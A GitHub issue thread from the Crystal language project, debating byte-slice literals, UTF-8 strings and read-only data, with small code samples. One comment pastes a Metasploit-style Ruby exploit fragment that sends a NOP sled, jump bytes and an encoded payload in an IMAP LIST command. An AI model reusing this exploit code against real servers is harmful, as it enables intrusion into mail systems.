Literals for Slice(UInt8) #2886
Comments
I would tend towards 2 with something like #2791 (comment) as the preferred alternative. Either way we need to make sure to not run into issues similar to #2485. |
Same here:
But I like that. |
One issue we found the other day is that we needed to do a POST in the HTTP client with binary data. We made it work by simply creating a String with that data and then invoking To compare with other statically typed languages, Go's strings are also just byte chunks that can hold arbitrary bytes, but can also be treated as UTF-8 strings when needed: https://blog.golang.org/strings Java's String class is supposed to be UTF-16, but can hold arbitrary bytes as well. |
I very much like that String is supposed to handle UTF-8 valid data and operations on that. And nothing else. I would hate to lose that property and rather prefer convenience API added to other interfaces for handling |
I am with @jhass here. I would keep String as valid UTF-8. I would rather add overloads in the http client to send/receive blobs. |
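To make the distinction in the comments above concrete, here is a minimal sketch, assuming a current Crystal standard library (the variable names are purely illustrative). Arbitrary bytes fit in a Bytes value, and String#valid_encoding? reports whether a string built from them is valid UTF-8.

```crystal
# Bytes is an alias for Slice(UInt8) and can hold any byte values.
sigma = Bytes[0xCF, 0x83] # the UTF-8 encoding of "σ"
blob = Bytes[0xFF, 0x00]  # not valid UTF-8

text = String.new(sigma)
puts text                 # σ
puts text.valid_encoding? # true

# String.new(Bytes) copies the bytes as they are, without validating them.
broken = String.new(blob)
puts broken.valid_encoding? # false
puts broken.bytesize        # 2
```

Keeping binary payloads in Bytes and converting only data known to be text avoids ever producing the second kind of string.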
Would it be helpful or more performant to have |
@mperham Good idea, an overload that writes directly to an IO is missing. Should be easy to add. |
Just a side note, I'm trying to write the Slice(UInt8) out to the Kemal response:
def self.serve(filename, resp)
  resp.status_code = 200
  resp.write Base64.decode(WEB_ASSETS[filename])
end
I verified that the Slice size is exactly the same size as the file on disk but the response only has about half the expected bytes. Anyone know why the server response is not writing the entire Slice to the client? |
@mperham we'd probably need a concrete code that we can reproduce to check if something works wrong. I tried creating a slice of 5000~50000 bytes and it works well. |
Looks like the problem is related to me not setting the content-type header. The browser prints out the PNG contents as text/html but serves it correctly when I set it to "application/octet-stream". |
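The fix described above can be sketched with the standard library alone. This is only an illustration under assumptions: the WEB_ASSETS table and its single entry are hypothetical stand-ins, and the response is written into an IO::Memory instead of a real Kemal connection so that the result can be inspected.

```crystal
require "http/server"
require "http/client"
require "base64"

# Hypothetical asset table: file name => Base64-encoded contents.
WEB_ASSETS = {"pixel.bin" => Base64.strict_encode(Bytes[0x89, 0x50, 0x4E, 0x47])}

def serve(filename, resp)
  resp.status_code = 200
  # Declare the payload as binary so the client does not treat it as text/html.
  resp.content_type = "application/octet-stream"
  resp.write Base64.decode(WEB_ASSETS[filename])
end

# Write the response into memory, then parse it back to check what was sent.
io = IO::Memory.new
resp = HTTP::Server::Response.new(io)
serve("pixel.bin", resp)
resp.close

io.rewind
parsed = HTTP::Client::Response.from_io(io)
puts parsed.headers["Content-Type"]
puts parsed.body.bytesize
```

In a Kemal handler the same header would be set on the handler's response object before writing the body.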
Just throwing thoughts into the mix here: How about a literal that generates a View(UInt8) which would be a read only type derived from Slice(UInt8)? If it's known at compile time an area is unwritable, we should be helped at compile time, avoiding a crash where possible. |
How about letting users create their own literal types (maybe in Then we can create some custom literals for |
Any progress on this? |
@maxpowa
io = IO::Memory.new
io.write UInt8.slice(1, 1, 1, 1, 1, 1, 1, 1)
io.rewind
io.write_bytes(0x00000000, IO::ByteFormat::BigEndian)
io.to_slice # Bytes[0, 0, 0, 0, 1, 1, 1, 1] |
Yep nevermind, it is indeed working... I must have done something wrong when I was testing. Thanks @exilor |
This has been implemented in cd8296b, by the way. I think it's a really bad idea to allow broken string literals in the language's core syntax. I noticed that some people are already doing hideous things with it, without really understanding the situation... The alternative solution is the way to go. And Side note: in Python |
@oprypin but sometimes people need to do hideous things for hideous causes :)
def exploit
  connected = connect_login
  nopes = "\x90"*(payload_space-payload.encoded.length) # to be fixed with make_nops()
  sjump = "\xEB\xF9\x90\x90" # Jmp Back
  njump = "\xE9\xDD\xD7\xFF\xFF" # And Back Again Baby ;)
  evil = nopes + payload.encoded + njump + sjump + [target.ret].pack("A3")
  print_status("Sending payload")
  sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
  sock.put(sploit)
  handler
  disconnect
end
etc.... |
It's still easy enough to construct a string with invalid data, I just don't think it should be part of the syntax. |
@bararchy, thanks for a good demonstration of the point I was making... All of these should have been |
I forgot that this issue existed and just started writing a new one. So, ping Putting bytes literals in read-only data is a must-have, and so if the literal produces a writable |
Right now this is solved because one can use a String for this, because a String can now have arbitrary bytes. I know it's not the most elegant solution, but for now it works. We can postpone a real solution for this for later. |
pls |
What if we add:
b"some content"
For now that would be equivalent to:
"some content".to_slice
and of course you can use We could also have:
b'x'
to be the same as I think Rust uses the same notation. |
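For reference, a small sketch of what the proposed equivalents evaluate to in current Crystal. The reading of b'x' as a single UInt8 is an assumption, since that part of the comment is not spelled out.

```crystal
# What the proposed b"some content" would expand to.
content = "some content".to_slice
puts content.size       # 12
puts content[0]         # 115, the byte value of 's'
puts content.read_only? # true

# One possible reading of b'x' (assumption): the byte value of the character.
x = 'x'.ord.to_u8
puts x # 120
```

Note that String#to_slice already hands back a read-only slice, which matters for the read-only data discussion in this thread.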
My suggestion that I started to write: It would be a literal that does not allow I propose the syntax Side note, I would also suggest removing the hexadecimal notation from strings. Obviously, to replace the use case, the bytes literal would need to store the data in the read-only data section. I don't know whether that means that the size of the slice would need to be moved there as well, like it is with strings.
|
Oh, with For that we'll probably need But for now I'd leave the ability to have |
I don't think it's that important to prevent strings that are not valid UTF-8. The only way to create them is |
@asterite We wouldn't need to know about |
@RX14, are you sure you understand the part about putting this in read-only data section? |
@oprypin yes.... you pass a pointer to the data in the RO section to the slice constructor. The slice instance itself has to live on the stack anyway, so can't be in ROdata. |
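The mechanism described in this comment can be approximated today with a string literal standing in for the read-only data. This is a sketch under that assumption, not how a bytes literal would necessarily be implemented; the variable names are illustrative.

```crystal
# Stand-in for data emitted by the compiler: the bytes of a string literal.
literal = "filemagic"

# The slice value itself is just a pointer plus a size, flagged as read-only.
view = Slice.new(literal.to_unsafe, literal.bytesize, read_only: true)
puts view.read_only? # true
puts view[0]         # 102, the byte value of 'f'

# Writes through a read-only slice are rejected at runtime.
begin
  view[0] = 0_u8
rescue ex
  puts ex.message
end

# A copy lives in freshly allocated memory and is writable.
copy = view.dup
copy[0] = 70_u8
puts String.new(copy) # Filemagic
```

The runtime check is what the thread means by crashing on write; a compile-time guarantee would need a distinct type, as suggested earlier with View(UInt8).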
@RX14 Please reopen this |
Why was this even closed and all those other issues which are most definitely not fixed? |
I would go one step further and use a completely new syntax similar to Elixir's bitstrings, rather than simply borrowing the one for string literals:
<<0x12>> # => <<0x12>>
<<0x21>> # => "!"
<<0xCF, 0x83>> # => "σ"
"\xCF\x83" # => "σ"
<<0x12, 0xCF, 0x83>> # => <<0x12, 0xCF, 0x83>>
"\x12\xCF\x83" # => <<0x12, 0xCF, 0x83>>
<<0x12, "σ">> # => <<0x12, 0xCF, 0x83>>
(Every double-quoted string literal in Elixir denotes a bitstring. Single-quoted ones produce charlists.) An attractive feature is that they can handle multibyte sequences:
<<0x12345678::32>> # => <<18, 52, 86, 120>>
<<0x12345678::32-little>> # => <<120, 86, 52, 18>>
<<1.0::little>> # => <<0, 0, 0, 0, 0, 0, 240, 63>>
<<1.0::32-little>> # => <<0, 0, 128, 63>>
<<0xCF83::16>> # => "σ"
<<0x83CF::16-little>> # => "σ"
<<"σ"::utf8>> # => "σ"
<<"σ"::utf16-little>> # => <<195, 3>>
<<0x03C3::utf8>> # => "σ"
<<0x03C3::utf16-big>> # => <<3, 195>>
It emphasizes the fact that byte arrays are a more general concept than string-like byte sequences. It is important that both the If we have an extremely fast |
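For comparison, the multibyte cases can be reproduced at runtime in Crystal with IO::ByteFormat. This is a minimal sketch; the encode helper is hypothetical and not part of the standard library.

```crystal
# Hypothetical helper: encode one number into bytes using the given byte order.
def encode(value, format : IO::ByteFormat) : Bytes
  io = IO::Memory.new
  io.write_bytes(value, format)
  io.to_slice
end

p encode(0x12345678, IO::ByteFormat::BigEndian)    # Bytes[18, 52, 86, 120]
p encode(0x12345678, IO::ByteFormat::LittleEndian) # Bytes[120, 86, 52, 18]
p encode(1.0_f32, IO::ByteFormat::LittleEndian)    # Bytes[0, 0, 128, 63]
p encode(1.0, IO::ByteFormat::LittleEndian)        # Bytes[0, 0, 0, 0, 0, 0, 240, 63]
```

Unlike a literal, this allocates and encodes at runtime, so it does not address the requirement of placing the data in the read-only section.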
Just to throw yet another idea in: Ruby also has ?\C-g == ?\a # => true Then again, b( "filemagic", 0x01, 0x02, '\a', '\C-g' ) |
We need a way to express binary data embedded in the data section of the program. We can do this right now for strings, but there's no way to create a non-UTF8 string with a string literal.
There are several ways we can fix this:
1. Add a \x... escape to string literals, to add a byte with a specific hexadecimal value. Right now strings can hold non-UTF8 data, they just raise when using those strings as UTF-8 data (for example, iterating them), so it's strange that they can hold non-UTF8 data but one can't create them with a literal. From there, one could take a slice. This will also solve #2565 (Remove macro methods from the language) because inspecting a string with non-valid codepoints will output \x... for those values.
2. Add a literal for Slice(UInt8). It could just be Slice(UInt8), but these are not read-only. Or maybe they can be read-only and they can crash the program when written. One shouldn't write them, the same way as one doesn't get a slice from a string literal and writes to it. There was the idea of introducing const [...] for this, with which we could create static data for any kind of integer value.
This doesn't have a big priority right now, but I'm leaving it here so there's a place to discuss this.